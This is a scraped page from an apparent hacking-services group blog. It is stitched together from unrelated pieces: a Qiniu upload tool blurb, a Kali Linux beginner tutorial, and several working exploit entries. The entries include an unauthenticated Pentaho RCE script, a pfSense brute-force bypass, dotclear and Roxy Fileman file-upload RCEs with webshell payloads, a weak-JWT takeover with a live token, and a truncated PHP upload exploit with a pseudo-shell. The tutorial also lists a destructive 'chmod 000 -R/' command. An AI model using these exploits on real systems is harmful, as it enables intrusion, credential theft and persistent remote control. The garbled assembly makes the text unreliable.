Foreword
Qiniu Cloud upload tool, developed using Java.
User Demo
About configuration
Project download: java Qiniu Cloud
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113812
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
import requests
import argparse
parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"
print ("running...")
r = requests.get(url)
if r.text == 'false':
print ("command should've executed! nice.")
else:
print ("didn't work. sadge...")
#!/usr/bin/python3
## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
## Google Dork: intitle:"pfSense - Login"
## Date: 2023-04-07
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
## Vendor Homepage: https://www.pfsense.org/
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
## Version: pfSenseCE <= 2.6.0
## CVE: CVE-2023-27100
# Vulnerability
## CVE: CVE-2023-27100
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66
import requests
import sys
import re
import argparse
import textwrap
from urllib3.exceptions import InsecureRequestWarning
# Expected Arguments
parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
parser.add_argument("-u", "--usersList", help="Username Dictionary")
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
args = parser.parse_args()
if len(sys.argv) < 2:
print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
sys.exit(1)
# Variable
url = args.url
usersList = args.usersList
passwdList = args.passwdList
# Suppress only the single warning from urllib3 needed.
if url.upper().startswith("HTTPS://"):
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')
def login(userlogin, userpasswd):
session = requests.session()
r = session.get(url, verify=False)
# Getting CSRF token value
csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
csrftoken = csrftoken.group(1)
# Specifying Headers Value
headerscontent = {
'User-Agent': 'Mozilla/5.0',
'Referer': f"{url}",
'X-Forwarded-For': '42.42.42.42'
}
# POST REQ data
postreqcontent = {
'__csrf_magic': f"{csrftoken}",
'usernamefld': f"{userlogin}",
'passwordfld': f"{userpasswd}",
'login': 'Sign+In'
}
# Sending POST REQ
r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)
# Conditional loops
if r.status_code != 200:
print(f'[*] - Found Valid Credential !!')
print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
sys.exit(0)
# Reading User.txt & Pass.txt files
userfile = open(usersList).readlines()
passfile = open(passwdList).readlines()
for user in userfile:
user = user.strip()
for passwd in passfile:
passwd = passwd.strip()
login(user, passwd)
Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)
Application: dotclear
Version: 2.25.3
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://dotclear.org/
Software Link: https://dotclear.org/download
Date of found: 08.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
While writing a blog post, we know that we can upload images. But php did not allow file upload. This time
<?php echo system("id"); ?>
I wrote a file with the above payload, a poc.phar extension, and uploaded it.
We were able to run the php code when we visited your page
poc request:
POST /dotclear/admin/post.php HTTP/1.1
Host: localhost
Content-Length: 566
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc
Connection: close
post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=
poc video : https://youtu.be/oIPyLqLJS70
## Exploit Title: ever gauzy v0.281.9 - JWT weak HMAC secret
## Author: nu11secur1ty
## Date: 04.08.2023
## Vendor: https://gauzy.co/
## Software: https://github.com/ever-co/ever-gauzy/releases/tag/v0.281.9
## Reference: https://portswigger.net/kb/issues/00200903_jwt-weak-hmac-secret
## Description:
It was, detected a JWT signed using a well-known `HMAC secret key`.
The key used which was found was a secret Key.
The user can find a secret key authentication while sending normal
post requests.
After he found the `Authorization: Bearer` key he can use it to authenticate
and he can be sending a very malicious POST request, it depends on the
scenario.
STATUS:
[+]Issue: JWT weak HMAC secret
[+]Severity: High
[+]Exploit:
```GET
GET /api/auth/authenticated HTTP/2
Host: apidemo.gauzy.co
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Accept: application/json, text/plain, */*
Language: en
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjJjMWViM2ViLTI3ZDEtNGE2Ni05YjEzLTg4ODVhNmFhYWJlMiIsInRlbmFudElkIjoiMTA0YjhiMDQtNmYzNi00YWMzLWFjNWItNTg4MWQyNjJmMWUxIiwiZW1wbG95ZWVJZCI6bnVsbCwicm9sZSI6IlNVUEVSX0FETUlOIiwicGVybWlzc2lvbnMiOlsiQURNSU5fREFTSEJPQVJEX1ZJRVciLCJURUFNX0RBU0hCT0FSRCIsIlBST0pFQ1RfTUFOQUdFTUVOVF9EQVNIQk9BUkQiLCJUSU1FX1RSQUNLSU5HX0RBU0hCT0FSRCIsIkFDQ09VTlRJTkdfREFTSEJPQVJEIiwiSFVNQU5fUkVTT1VSQ0VfREFTSEJPQVJEIiwiT1JHX1BBWU1FTlRfVklFVyIsIk9SR19QQVlNRU5UX0FERF9FRElUIiwiT1JHX0lOQ09NRVNfVklFVyIsIk9SR19JTkNPTUVTX0VESVQiLCJPUkdfRVhQRU5TRVNfVklFVyIsIk9SR19FWFBFTlNFU19FRElUIiwiUFJPRklMRV9FRElUIiwiRU1QTE9ZRUVfRVhQRU5TRVNfVklFVyIsIkVNUExPWUVFX0VYUEVOU0VTX0VESVQiLCJPUkdfUFJPUE9TQUxTX1ZJRVciLCJPUkdfUFJPUE9TQUxTX0VESVQiLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX1ZJRVciLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX0VESVQiLCJPUkdfVEFTS19BREQiLCJPUkdfVEFTS19WSUVXIiwiT1JHX1RBU0tfRURJVCIsIk9SR19UQVNLX0RFTEVURSIsIk9SR19USU1FX09GRl9WSUVXIiwiT1JHX0VNUExPWUVFU19WSUVXIiwiT1JHX0VNUExPWUVFU19FRElUIiwiT1JHX0NBTkRJREFURVNfVklFVyIsIk9SR19DQU5ESURBVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV19WSUVXIiwiT1JHX0NBTkRJREFURVNfRE9DVU1FTlRTX1ZJRVciLCJPUkdfQ0FORElEQVRFU19UQVNLX0VESVQiLCJPUkdfQ0FORElEQVRFU19GRUVEQkFDS19FRElUIiwiT1JHX0lOVkVOVE9SWV9QUk9EVUNUX0VESVQiLCJPUkdfSU5WRU5UT1JZX1ZJRVciLCJPUkdfVEFHU19BREQiLCJPUkdfVEFHU19WSUVXIiwiT1JHX1RBR1NfRURJVCIsIk9SR19UQUdTX0RFTEVURSIsIk9SR19VU0VSU19WSUVXIiwiT1JHX1VTRVJTX0VESVQiLCJPUkdfSU5WSVRFX1ZJRVciLCJPUkdfSU5WSVRFX0VESVQiLCJBTExfT1JHX1ZJRVciLCJBTExfT1JHX0VESVQiLCJQT0xJQ1lfVklFVyIsIlBPTElDWV9FRElUIiwiVElNRV9PRkZfRURJVCIsIlJFUVVFU1RfQVBQUk9WQUxfVklFVyIsIlJFUVVFU1RfQVBQUk9WQUxfRURJVCIsIkFQUFJPVkFMU19QT0xJQ1lfVklFVyIsIkFQUFJPVkFMU19QT0xJQ1lfRURJVCIsIkNIQU5HRV9TRUxFQ1RFRF9FTVBMT1lFRSIsIkNIQU5HRV9TRUxFQ1RFRF9DQU5ESURBVEUiLCJDSEFOR0VfU0VMRUNURURfT1JHQU5JWkFUSU9OIiwiQ0hBTkdFX1JPTEVTX1BFUk1JU1NJT05TIiwiQUNDRVNTX1BSSVZBVEVfUFJPSkVDVFMiLCJUSU1FU0hFRVRfRURJVF9USU1FIiwiU1VQRVJfQURNSU5fRURJVCIsIlBVQkxJQ19QQUdFX0VESVQiLCJJTlZPSUNFU19WSUVXIiwiSU5WT0lDRVNfRURJVCIsIkVTVElNQVRFU19WSUVXIiwiRVNUSU1BVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdFUlNfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV0VSU19WSUVXIiwiVklFV19BTExfRU1BSUxTIiwiVklFV19BTExfRU1BSUxfVEVNUExBVEVTIiwiT1JHX0hFTFBfQ0VOVEVSX0VESVQiLCJWSUVXX1NBTEVTX1BJUEVMSU5FUyIsIkVESVRfU0FMRVNfUElQRUxJTkVTIiwiQ0FOX0FQUFJPVkVfVElNRVNIRUVUIiwiT1JHX1NQUklOVF9WSUVXIiwiT1JHX1NQUklOVF9FRElUIiwiT1JHX0NPTlRBQ1RfRURJVCIsIk9SR19DT05UQUNUX1ZJRVciLCJPUkdfUFJPSkVDVF9BREQiLCJPUkdfUFJPSkVDVF9WSUVXIiwiT1JHX1BST0pFQ1RfRURJVCIsIk9SR19QUk9KRUNUX0RFTEVURSIsIk9SR19URUFNX0FERCIsIk9SR19URUFNX1ZJRVciLCJPUkdfVEVBTV9FRElUIiwiT1JHX1RFQU1fREVMRVRFIiwiT1JHX1RFQU1fSk9JTl9SRVFVRVNUX1ZJRVciLCJPUkdfVEVBTV9KT0lOX1JFUVVFU1RfRURJVCIsIk9SR19DT05UUkFDVF9FRElUIiwiRVZFTlRfVFlQRVNfVklFVyIsIlRJTUVfVFJBQ0tFUiIsIlRFTkFOVF9BRERfRVhJU1RJTkdfVVNFUiIsIklOVEVHUkFUSU9OX1ZJRVciLCJGSUxFX1NUT1JBR0VfVklFVyIsIlBBWU1FTlRfR0FURVdBWV9WSUVXIiwiU01TX0dBVEVXQVlfVklFVyIsIkNVU1RPTV9TTVRQX1ZJRVciLCJJTVBPUlRfRVhQT1JUX1ZJRVciLCJNSUdSQVRFX0dBVVpZX0NMT1VEIiwiT1JHX0pPQl9FTVBMT1lFRV9WSUVXIiwiT1JHX0pPQl9NQVRDSElOR19WSUVXIiwiSU5WRU5UT1JZX0dBTExFUllfQUREIiwiSU5WRU5UT1JZX0dBTExFUllfVklFVyIsIklOVkVOVE9SWV9HQUxMRVJZX0VESVQiLCJJTlZFTlRPUllfR0FMTEVSWV9ERUxFVEUiLCJNRURJQV9HQUxMRVJZX0FERCIsIk1FRElBX0dBTExFUllfVklFVyIsIk1FRElBX0dBTExFUllfRURJVCIsIk1FRElBX0dBTExFUllfREVMRVRFIiwiT1JHX0VRVUlQTUVOVF9WSUVXIiwiT1JHX0VRVUlQTUVOVF9FRElUIiwiT1JHX0VRVUlQTUVOVF9TSEFSSU5HX1ZJRVciLCJPUkdfRVFVSVBNRU5UX1NIQVJJTkdfRURJVCIsIkVRVUlQTUVOVF9NQUtFX1JFUVVFU1QiLCJFUVVJUE1FTlRfQVBQUk9WRV9SRVFVRVNUIiwiT1JHX1BST0RVQ1RfVFlQRVNfVklFVyIsIk9SR19QUk9EVUNUX1RZUEVTX0VESVQiLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX1ZJRVciLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX0VESVQiLCJWSUVXX0FMTF9BQ0NPVU5USU5HX1RFTVBMQVRFUyIsIlRFTkFOVF9TRVRUSU5HIiwiQUxMT1dfREVMRVRFX1RJTUUiLCJBTExPV19NT0RJRllfVElNRSIsIkFMTE9XX01BTlVBTF9USU1FIiwiREVMRVRFX1NDUkVFTlNIT1RTIl0sImlhdCI6MTY4MDk4MDAzMn0.3zm2CQ0udVj5VCBYgPPD8BzkhQ_5TgVVi91sN7eMKlw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.gauzy.co
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.gauzy.co/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 76
{
"email":"local.admin@ever.co",
"password": "adminrrrrrrrrrrrrrrrrrrrrrHACKED"
}
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/gauzy.co/2023/ever-gauzy-v0.281.9)
## Proof and Exploit:
[href](https://streamable.com/afsmee)
## Time spend:
03:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Preface
This article is about a friend who is just studying kali. This article will start from the following aspects: the command, artifact, penetration test, and three aspects. If there are any other aspects that are not involved, please leave a message below for my convenience! The original work of this article is Xiaoyaozi. If you need to reprint it, please contact the author first. You can only reprint it after agreeing. At the same time, you can join the QQ communication group: (618207388) or follow the WeChat public account kali hacker teaching or kali forum to update simultaneously!
What is kali linux
Kali is a Debian-based Linux distribution. Its goal is to simplify: include as many penetration and audit tools as possible in a practical toolkit. Kali Linux is an open source project that is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services.
kali installation
USB disk installation virtual machine installation (recommended) Physical machine installation Raspberry Pi (a superior device in the world of pretending)
kali installation (vm) configuration
Memory 2G (minimum) hard disk (20-40G) wireless network card (recommended 8187) processor 4 cores
kali can install graphical interfaces or use only command line interfaces. According to your actual situation, if your device is relatively high-end, it is recommended to install a graphical interface. If the device is not high-end, it is recommended to install a command interface such as Raspberry Pi. Otherwise the graphical interface will take up a lot of resources. It should be noted that in Kali, the two interfaces can be switched to each other.
Reference article: Switching of kalilinux's graphical interface and text interface
Switch files of kalilinux's graphical interface and text interface to modify whether the graphics configuration is enabled: the file that configures the graphical line interface is vi /etc/def.
It should be noted that the default username of kali is root password is goor 
kali Commands
File Operation
Copy Move Delete
Copy the file
cp /root/123.txt /var/www Copy 123.txt in the root directory to the /var/www directory.
Move files
mv /root/123.txt /var/www delete file
rm 123.txtps: Delete the entire file under folder 123
rm -rf 123
Change paths and create folders
View the current path
pwd switch directory
cd /var/www create folder
mkdir hacker
Text Operation
View File
cat
The most commonly used cat command is. Note that if the file is large, the output result of the cat command will be output on the terminal crazily. You can press ctrl+c multiple times to terminate.
View file size
du -h file
View file content
cat file Since cat has this problem, for larger files, we can use the less command to open a file.
Similar to vim, less can enter the search mode after input/, and then press n(N) to search down (upper).
There are many operations, all similar to vim, you can take a look at it in an analogy. tail
Most students who do server development understand this command. For example, check nginx's scrolling log.
tail -f access.logtail command can statically view the last n lines of a file, and correspondingly, the head command can view the n lines of the file header. But the head does not have a scrolling function, just like the tail is growing outward and will not grow inward.
tail -n100 access.log
head -n100 access.log
Other
grep
grep is used to filter the content, with the --color parameter, which can print colors at the supported terminal, and the parameter n outputs the specific number of lines for quick positioning.
For example: Check the POST request in nginx log.
grep -rn --color POST access.log recommends using such parameters every time.
If I want to see the relevant content before and after an exception, I can use the ABC parameter. They are abbreviations for several words and are often used.
A after content n lines
B before content n lines
C count? N lines before and after content
It's like this:
grep -rn --color Exception -A10 -B2 error.logdiff
The diff command is used to compare the differences between two files. Of course, this function is provided in the ide, and diff is just the original tradeoff under the command line. By the way, diff and patch are also patching methods for some platform source code. If you don’t use it, just pass it.
Compression and decompression command
In order to reduce the size of the transferred file, compression is generally enabled. Common compressed files under Linux include tar, bzip2, zip, rar, etc. 7z is used relatively rarely.
tar compress or decompress bz2 using the tar command operate gz using the gzip command operate zip using the unzip command decompress rar use the unrar command to decompress
The most commonly used file format is the .tar.gz file format. In fact, it is after tar package and then compressed using gzip.
Create a compressed file
tar cvfz archive.tar.gz dir/
Decompression
tar xvfz. archive.tar.gz
Other common commands
chown
chown Used to change the user and group of files. chmod is used to change the access permissions of files.
Both commands are related to linux's file permissions 777.
Example:
Destructive Command
chmod 000 -R/Modify the user and group of directory a to xjj
chown -R xjj:xjj a adds execution permissions to a.sh file (this is too common)
chmod a+x a.shyum
Assuming you are using centos, the package management tool is yum. If your system does not have a wget command, you can use the following command to install it.
yum install wget -ysystemctl
Of course, there are some tricks to manage the backend service in centos. The service command is. Systemctl is compatible with service commands. Let's take a look at how to restart mysql service. Recommended to use the following.
service mysql restart
systemctl restart mysqld For ordinary processes, you need to use the kill command for more detailed control. There are many signals for kill command. If you are using kill -9, you must want to understand the differences and uses of kill -15 and kill -3. su
su is used to switch users. For example, if you are root now and want to use xjj users to do some activities, you can use su to switch.
su xjj
su - xjj
# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Upload
# Date: 09/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: roxyfileman.com
# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net
# Version: <= 1.4.5
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##########################################################################################
# First, we upload the .jpg shell file to the server. #
##########################################################################################
POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2
Host: pentest.com
Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest
Content-Length: 666
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pentest.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pentest.com/admin/fileman/index.aspx
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="action"
upload
------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="method"
ajax
------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="d"
/Upload/PenTest
------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="files[]"; filename="test.jpg"
Content-Type: image/jpeg
‰PNG
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundarygOxjsc2hpmwmISeJ--
##########################################################################################
# In the second stage, we manipulate the .jpg file that we uploaded to the server. #
##########################################################################################
{
"FILES_ROOT": "",
"RETURN_URL_PREFIX": "",
"SESSION_PATH_KEY": "",
"THUMBS_VIEW_WIDTH": "140",
"THUMBS_VIEW_HEIGHT": "120",
"PREVIEW_THUMB_WIDTH": "300",
"PREVIEW_THUMB_HEIGHT":"200",
"MAX_IMAGE_WIDTH": "1000",
"MAX_IMAGE_HEIGHT": "1000",
"INTEGRATION": "ckeditor",
"DIRLIST": "asp_net/main.ashx?a=DIRLIST",
"CREATEDIR": "asp_net/main.ashx?a=CREATEDIR",
"DELETEDIR": "asp_net/main.ashx?a=DELETEDIR",
"MOVEDIR": "asp_net/main.ashx?a=MOVEDIR",
"COPYDIR": "asp_net/main.ashx?a=COPYDIR",
"RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR",
"FILESLIST": "asp_net/main.ashx?a=FILESLIST",
"UPLOAD": "asp_net/main.ashx?a=UPLOAD",
"DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD",
"DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR",
"DELETEFILE": "asp_net/main.ashx?a=DELETEFILE",
"MOVEFILE": "asp_net/main.ashx?a=MOVEFILE",
"COPYFILE": "asp_net/main.ashx?a=COPYFILE",
"RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE",
"GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB",
"DEFAULTVIEW": "list",
"FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess",
"ALLOWED_UPLOADS": "bmp gif png jpg jpeg",
"FILEPERMISSIONS": "0644",
"DIRPERMISSIONS": "0755",
"LANG": "auto",
"DATEFORMAT": "dd/MM/yyyy HH:mm",
"OPEN_LAST_DIR": "yes"
}
############################################################################################################################################################################################################################
# We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows. #
############################################################################################################################################################################################################################
POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2
Host: pentest.com
Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest
Content-Length: 44
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pentest.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pentest.com/admin/fileman/index.aspx
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx
===========================================================================================================================================================================================================================
POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2
Host: pentest.com
Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest
Content-Length: 68
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pentest.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pentest.com/admin/fileman/index.aspx
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx
##########################################################################################
# and it's done! #
##########################################################################################
HTTP/2 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
X-Aspnet-Version: 4.0.30319
X-Powered-By-Plesk: PleskWin
Date: Sun, 09 Apr 2023 09:49:34 GMT
Content-Length: 21
{"res":"ok","msg":""}
=============================================================================================
#!/usr/bin/env python3
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
# Date: 09/04/2023
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip
# Version: 1.0
# Tested on: Debian 11.6
# CVE : CVE-2023-1826
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone
def interactiveShell(fileUrl: str):
print("Entering pseudo-shell. Type 'exit' to quit")
while True:
command = input("\n$ ")
if command == "exit":
break
response = requests.get(f"{fileUrl}?cmd={command}")
print(response.text)
def uploadFile(url: str, filename: str, content):
endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"
file = {"img": (filename, content)}
response = requests.post(endpoint, files=file)
return response
def getUploadedFileUrl(url: str, filename: str):
timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes
epoch = int(timeNow.timestamp()) # Time in milliseconds
possibleFilename = f"{epoch}_{filename}"
fileUrl = f"{url}/uploads/{possibleFilename}"
response = requests.get(fileUrl)
if response.status_code == 200:
return fileUrl
def exploit(url: str):
filename = str(uuid4()) + ".php"
